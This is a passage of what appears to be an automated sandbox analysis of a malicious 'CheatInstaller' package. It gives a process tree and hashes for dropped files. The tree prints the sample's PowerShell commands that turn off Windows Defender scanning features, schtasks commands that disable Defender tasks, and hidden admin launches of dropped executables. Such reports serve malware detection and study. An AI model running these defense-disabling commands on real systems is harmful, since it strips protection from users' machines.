PID:4784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"5⤵PID:4996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"5⤵PID:1012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"5⤵PID:1644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"5⤵PID:4288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"5⤵PID:428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"5⤵PID:4416
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:4960
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:1352
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:4232
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:2548
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:1084
-
C:\Windows\Installer\MSI24F.tmp"C:\Windows\Installer\MSI24F.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"2⤵
- Executes dropped EXE
PID:1368 -
C:\Windows\Installer\MSI250.tmp"C:\Windows\Installer\MSI250.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"2⤵
- Executes dropped EXE
PID:3928 -
C:\Windows\Installer\MSI251.tmp"C:\Windows\Installer\MSI251.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"2⤵
- Executes dropped EXE
PID:4784 -
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2896 -
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exeC:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4208
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD5f8956fac1060d0cbc26c41e99b5a6eb9
SHA13213ae83af317b0b5b30bc5f259e316cbc4f08bb
SHA256eebcc0414d9ac5aaec4c49be85de516a2472672effb1be883dcdadb4521473d6
SHA51291df0963ad52780b5c9f20aeaf6d6d77c6ad50dcb1554bdf1cc8534cc94dd299f8be0071ed4debd5b103498b966379a266e8e5a76319619b8976102c0489fb74
-
Filesize
27.0MB
MD5e63a8f56acfabd4d75da44d3bda51884
SHA17d7ec25c29c5d562f8f0c2fb8d574680ce6836f7
SHA2563cfba77df07101d2a7ef245e7c117716a67f67a2f2ec060f9c534dd0d8cc1db9
SHA512e3af8ce282993fc89489d853cee0e447e8a7dfad749348c927d2a6b18f22da09bb4ed593d8891f3fc95fbfb2a090e2ab3121ec4a7659bc7c7b6d36756e164d02
-
Filesize
12.9MB
MD598646960d36b268658a83e8a61b021a3
SHA19888a52fb997168a6e32bab22a39ffcb55f4a2cb
SHA25688d877705743ea6d2e267a9be26fec96a7f3b0c8bdfa587c955e716752b9179d
SHA512be893a672f6a7e7f649ae7886c60702e5465d0088a83dcde2d9879e1a962352d2633476e97a8a4e94d8c9715cdf8a3c5c8199e4bc36dbdb9663e1eb22a532ebf
-
Filesize
302B
MD58da13f306c8c0f4f4a32960e93725b42
SHA1b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA51259e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js
Filesize15KB
MD512148d2dff9ca3478e4467945663fa70
SHA150998482c521255af2760ed95bbdb1c4f7387212
SHA2561fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js
Filesize14KB
MD57b33dd38c0c08bf185f5480efdf9ab90
SHA1b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA51222da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license
Filesize1KB
MD5d5f2a6dd0192dcc7c833e50bb9017337
SHA180674912e3033be358331910ba27d5812369c2fc
SHA2565c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2
-
Filesize
798B
MD5c637d431ac5faadb34aff5fbd6985239
SHA10e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA25627d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535
-
Filesize
739B
MD589966567781ee3dc29aeca2d18a59501
SHA1a6d614386e4974eef58b014810f00d4ed1881575
SHA256898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c
-
Filesize
11KB
MD5f03382535cd50de5e9294254cd26acba
SHA1d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016
-
Filesize
77B
MD58963201168a2449f79025884824955f2
SHA1b66edae489b6e4147ce7e1ec65a107e297219771
SHA256d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA5127f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000
-
Filesize
1KB
MD5915042b5df33c31a6db2b37eadaa00e3
SHA15aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA25648da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA5129c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13
-
Filesize
765B
MD582703a69f6d7411dde679954c2fd9dca
SHA1bb408e929caeb1731945b2ba54bc337edb87cc66
SHA2564ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA5123fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46
-
Filesize
1KB
MD5ee9bd8b835cfcd512dd644540dd96987
SHA1d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA5127d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0
-
Filesize
748B
MD590a3ca01a5efed8b813a81c6c8fa2e63
SHA1515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA25605dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31
-
Filesize
25B
MD5df9ffc6aa3f78a5491736d441c4258a8
SHA19d0d83ae5d399d96b36d228e614a575fc209d488
SHA2568005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA5126c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4
-
Filesize
23B
MD5d0707362e90f00edd12435e9d3b9d71c
SHA150faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA2563ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA5129d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE
Filesize787B
MD578e0c554693f15c5d2e74a90dfef3816
SHA158823ce936d14f068797501b1174d8ea9e51e9fe
SHA256a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js
Filesize16KB
MD5a8c344ac3d111b646df0dcae1f2bc3a3
SHA1d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json
Filesize1KB
MD51943a368b7d61cc3792a307ec725c808
SHA1fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA5127c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223
-
Filesize
19B
MD595b08bc3062cdc4b0334fa9be037e557
SHA1a6e024bc66f013d9565542250aef50091391801d
SHA256fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA51265c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42
-
Filesize
17B
MD56138da8f9bd4f861c6157689d96b6d64
SHA1ee2833a41c28830d75b2f3327075286c915ed0dd
SHA2566dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA5120a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md
Filesize717B
MD51750b360daee1aa920366e344c1b0c57
SHA1fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA2567f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4
-
C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE
Filesize1KB
MD5a5df515ef062cc3affd8c0ae59c059ec
SHA1433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA25668f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA5120b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0
-
Filesize
787B
MD55f114ac709a085d123e16c1e6363793f
SHA1185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597
-
Filesize
755B
MD55324d196a847002a5d476185a59cf238
SHA1dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA5121b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f
-
Filesize
756B
MD5ff53df3ad94e5c618e230ab49ce310fa
SHA1a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe
-
Filesize
1KB
MD5aea1cde69645f4b99be4ff7ca9abcce1
SHA1b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962
-
Filesize
1KB
MD5391090fcdb3d37fb9f9d1c1d0dc55912
SHA1138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e
-
Filesize
752B
MD59d215c9223fbef14a4642cc450e7ed4b
SHA1279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA2560cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA5125e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c
-
Filesize
719KB
MD5c9c085c00bc24802f066e5412defcf50
SHA1557f02469f3f236097d015327d7ca77260e2aecc
SHA256a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de
-
Filesize
1.1MB
MD56bb65410717bb2c62ed92cdbc9c41652
SHA11f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA25691a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA5121a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
4KB
MD5d3dff05f50e0edcecca77d97468a1aef
SHA187a217697bd981c8a9dc5a94ae65daf3ece5f081
SHA25686cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA5120b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005
-
Filesize
2KB
MD5845cf6630a4a8d184f93d0f732feb846
SHA11d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA25619f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e
-
Filesize
27KB
MD5a8a3a992fce81410c5771c10f743f6ba
SHA1d0dd0c52514afa2150b250e549dfebf87758f191
SHA256bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA5123edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830
-
Filesize
39KB
MD5b4aaf8eaa1aa2477670ed54128e2c742
SHA1b756fb677993bcf92916be8979052ed14a6170da
SHA2565a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f
-
Filesize
4B
MD564d1817b6bfcd6cfda309f8910f51b57
SHA19faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee
-
Filesize
256KB
MD56f4f55c3d6689bbba6170152425c0af1
SHA1ff8843cf6f1bd2cbb5e0d47148f438187f4cd4c6
SHA256723a152111c99627121df838cdd483587cb597835961b05c5ce22f135ad2f28f
SHA5126ec4bc8a3299ad3bd033d3d72c5d5ccad3eea773d11fc603a6cf477304f223ce7cd2d568da092cc69d91bbab85aa3b609b03d7ff66e3d1791a2a4cd2d97e8323
-
Filesize
256KB
MD50e6bcca437f8db26c23aad3020e333ea
SHA19feb3ff5d33ecb53404920b4183223d8eb724e73
SHA2565e57136d97bfc46f48d673a682af6729e209dd70b402f83b34e118cfa18c2763
SHA512b317f3d0628c0a4644127911a0cf6dc001f449d2aff23f8c7ba418aa742f9e02f15a3de926798d97bab99fe80ed2872152c770a39467e29b1db94acd598344aa
-
Filesize
192KB
MD52ac4632046ec129b1619d6e982c6bee9
SHA1bcf55c943a467ff5fe309ca25e856fd534b7b081
SHA256b1802ae3e05db654968e07cc7771e269ef45a52b830d4dbb617c149bbc9810ab
SHA512a1b24ff9dc21413509614fd9581bc999aa6448b7b9bcadf55b473597c3a063039e0a2b600d690208cff416e113f6e8318866463156f2c226567bc21929e799a6
-
Filesize
2.3MB
MD5f759d9f3f35dda05908011fcaed1d018
SHA10a7852907851700f7424094b7658d78743559dae
SHA2561780f4481aae5bc51fb79a42d92946ade0c5459efd99daa67bf2d1dcae275919
SHA5126cb7ab0ac9cb17d194b2a635dab9e5934d36623be7c126785cd83e1d98fe55a262068bc2676fd1499a07a1160005aff7d6199e9be544fad4581debcddf1b0390
-
Filesize
192KB
MD5194bb78e07935f96df77e7c83a0a6cb4
SHA1d445db61c505dad661a0652a5b81e5c676feb612
SHA256767e225832e7af1c8bac29ff889ece6834e5064f880dbd431bd531c33e635658
SHA5120ca46372975ec67c8725b9421c919a24b4310c088584332bf48198a3c8f336b3273716a99fdfd10791f0ba06a0a843b4f5e32384decc4ed8abc8ba67bdc00f97
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav
Filesize125KB
MD537c5ed6c4b4c4f6ef76e0bbfa6780b9a
SHA1d25a798bb75b194936092cbd7a1d308bf6cf01e4
SHA2569c62a3a77a1e1b781765d6a9c1c8cfe1a9805cea0038a92b013fd6d996fe379f
SHA512d78f095f25fc459b456449693ebb8a25ea42e92383423b6deaaf9156499ab9f7ed9d2088e40bdfb947b7e0579f5240ca27fdb8e462e82d87a6e06c357ee40d2d
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav
Filesize952KB
MD55acab132e4baf883d7f785fabf624952
SHA1dcd1e3fe209cea31e72531e1484b6bb156347308
SHA256e14563629a67f07764f12cfae343d8ddb0309cbda241391d095fbb6109302dd1
SHA512714ed7d425424006fbf248c2e5b95e6525f4abc6e563ecf544fe52f12881af7cf8bd73e790657766e545e753c23f1bd363dde8b6faba675bca147a22cc802c3c
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav
Filesize1.1MB
MD58255f67bfc3ecdc295769095a978febf
SHA129a86937fff81366d2f351e83013ec2085888daf
SHA25682bc4777da977bd63738158e8f62b5360eb817dabee32e8fad12c7abadf54cdd
SHA5125a4be89a24a8707ae06e0cb07fac2badb2b67f4b81e31716aea0cd9ee32901bb75c47ea7a58f0729cd29b84c94de9c02c802f776fb9c308cb2e36b12e45537ea
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav
Filesize2.3MB
MD51f17c039e805f0366322565c65c44a96
SHA158f9a9787e412e22bdfdf80ee989cd0ca76b7ec6
SHA256618f46233cb90b39d0da37f37033c0f181ece8583f814ce41c11d1a4d5c49666
SHA5122980f1616f9cc569cc5ecbaa6c71016488867bf0d2c53b51dedd828f5da12921c3582de61f127ca566f5d35c9398af6aa4bc3600845ef569fc8ec5388bdf7dca
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav
Filesize1.3MB
MD53699a680fb92582c06932c059886e8a5
SHA1a5b6dc92b96ac00a618175c7cbef055c7dbcd2c4
SHA2565af2f1f36d853007dbe6d62a9b9da9735ba1cf3d5116ca48a401655fb8f3b6cf
SHA512a067a77a24ffdd978fa26673d3e1124eee7f7d54e1cb59022442fb517558be6b160c7748c8d807be6911006738b7f741e2759fa488966c36a6272ea5f226fcc5
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav
Filesize1.2MB
MD5cc441e5812530ddb52d63bfe33152521
SHA178b197f5367ed251b1f1bb55bef8fdc64210c7d1
SHA25673af11ff7ade286f21495eedcdbf536bc77289dea238d95243c5c930fe3be14e
SHA5124f89beba3ffa2f36c24f7c786e26c8e6254041062f897122d7d3d05972a79fd28be82fbc4b273adf036b8bc4e6aad1dcbf08664a017d318cc79da85e31f570b6
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav
Filesize1.1MB
MD5c5f2abb4c90679145ee886d7f2a2df19
SHA1dc83ac69b8fe03a1a485e620a88001ff98c34bd4
SHA256875c89eee298d0d69e6757942212695c46d3f1e68170bfb52f2e2ba00d0d71cb
SHA5124ccd6d5b7ed7e7364f793a13ffc96cb9425a7913142150b398befec5411e6fb33102960b887ff219e34ec051da0b06a8fc189533c01d52de4deba10304cb4435
-
Filesize
1.1MB
MD595571baa50574628aadb70525035efd6
SHA153dff1840592588b9c52f472ae58fa249bc298e0
SHA256fb9232347afc7b2f56558801907b43c9c04a6efba3c5d3b02b1dc9ea1b2c1c83
SHA51216d0418192d56f3d35b75fd7b92119cdfda36ec27e728bdacc28d09c6ccbbf3f2ec02760415476824350f5c217e6df1ff3d2551d629101a41ce3643734f63ff8
-
Filesize
1.0MB
MD5040963f93a43be7b6050f002fd981578
SHA13c8df5a5c96e449a966d32af6c5835d6de74bb68
SHA2569ec8c24a8bddea004d078f9d1047c7a94fbd5d79c0ab88e84a8cef5d12e0d823
SHA512e14315902550192067ef3fcf95be951bda585306fcc0e54e3c14aad26aed3589147dfc88a4932ffce14dbc54ce58b45496da71eb347bef2dae97e981775e51d5
-
Filesize
439KB
MD513a5675639801f07b9b84df65e987bf4
SHA1dfe7f16f3ad5ad012e0560db6294186e47f5a61d
SHA2569ac4f4be2870852ed62d8b13cad5ac3a5245ba8956fdf9a0f634778a405c93f1
SHA51272cd54bf8ffb17c1d1909e3488206248742de63b6e6bdcf2549e0543b7a5e95902dc841cd38c2d02ccba1e6c3cb1fa32bdc1de1f87930da0c6522d5d82b9936e
-
Filesize
2.3MB
MD55392a5fb1c3d0ce48ee2f6db8c8c157c
SHA1694ad4d5939fa7d468399150a026a3efce6773bf
SHA2561033b1227e5a7814b34221274272b384f0f8ddbe31a600ff070ef1f0c1fee901
SHA5121a0ce0c2c5d4818eb83f38c4c3328eb4aab653a625e0e1fca5338e23f955d4da206c3b0bb3106a89736e69077f75079a3bc54fdc458cebe7389cc8a727e31988
-
Filesize
2.5MB
MD5be2e3041c72229ec79e9423603b942b2
SHA1af6f0bce06505f0a623e04a1e65965e124517dd6
SHA2565650a79a07f02fe153414827ea345edfdd52fd086b61435b030f2b21d86f057e
SHA512d6ade3a99d8132db77fe99869a4e9052d17df17a8b96280b77a8a5f908cbf265073d24f5314d2862d8c3d7f1eae9da8c34d2dc38aac6adfac24945e9b1472ce4
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav
Filesize768KB
MD5f36b5ff8446f487897df4dfc256f817d
SHA1d7e152ae0370860d4d6f8b86284762a5f2fc416d
SHA256ab60c5e17efa6938470e9518df24301934252891162a486546798b45ba3bc8a0
SHA512ee727c238d25db53c53a4b19bb22996f2ea4c7abd54de6a728a8892c0ed69753a38ea9410fb8789687fa3799ce2d718fe7ba9ac90dc26b2a48be950074bcd39e
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav
Filesize2.3MB
MD5fdc8f9825bac64dbdceff1b1ecfbcf53
SHA1d831b8fc76023af06b13a05811c18611b7c394f3
SHA2569d0e13ff2e27a1e3dd01847e67cf787050764c8b1369d90a60a3a03aa498d00a
SHA512e2216ab419edb6378ca85f1593330a2d68aa6867e4145a93a6a9c4fc0fc80a11f89f6f270ae95549982f0f5f4142512c6b3db7f6fd626971fa26295bccc88b46
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav
Filesize2.3MB
MD584cb9d76404e7060326ed19dc51a9a1f
SHA15945326bbc8b4e48afbea13f8c2cf564ffbafbee
SHA256c6ca1f7b252c74ae234c25f37b8eb0122945be66701bf22486c3c27de8d9908b
SHA51295f3fdab34ef9a3c4b797a50c2b00d068da4d309e6aad2b288c140d71a5ef45f182d36a97b99768f50fc226217b7b7ab6d4a4ba3ede529efa801cdbfea575d28
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs
Filesize13KB
MD5214ee30dbd649af9294f254fc8c33d07
SHA1e81a7486c5c19868abb7d39fc757f686c4124662
SHA256d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1
Filesize11KB
MD5beceb9c4ac840a5ac0b51d8774e63149
SHA1ea375fee5ff404065ba724e877c9a9b01509353b
SHA256d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA51248e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d
-
Filesize
2.8MB
